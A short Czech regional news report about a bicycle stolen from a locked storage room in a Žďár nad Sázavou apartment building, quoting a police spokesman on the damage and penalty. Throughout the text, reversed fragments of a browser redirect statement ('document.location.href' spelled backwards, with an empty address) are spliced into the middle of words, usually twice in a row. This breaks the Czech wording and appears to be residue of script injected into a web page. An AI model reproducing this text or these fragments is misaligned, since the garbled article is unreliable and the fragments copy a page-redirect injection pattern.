Rainbow page separator

Bicykl v kolárně byl zajištěný zámkem, zloděj ho stejně ukradl

Pátek, 31. srpna 2018

Zloděj ukradl z rodinného domku uniformu, pálenku i hodiny

Žďár nad Sázavou / Oznámení o odcizení jízdního kola z kolárny jednoho z by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových domů ve žďárské ulici Palachova v úterý 28. srpna dopoledne prověřovali žďárští policisté.
„Policisté zjistili, že doposud neznámý pachatel z kolárny by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tového domu odcizil visacím lankovým zámkem uzamčené jízdní kolo značky Apache Hawk, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to včetně jeho příslušenství, čímž majiteli způsobil škodu ve výši téměř sedmnáct tisíc korun,“ informoval o případu David Linhart z oddělení tisku a prevence Krajského ředitelství policie Kraje Vysočina.
Policisté podle jeho slov mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to činu ohledali, zajistili veškeré s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topy a případ zadokumen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovali jako přečin krádeže vloupáním.
„Za takový čin pachateli v případě jeho dopadení hrozí trest odnětí svobody až na dva roky,“ doplnil David Linhart.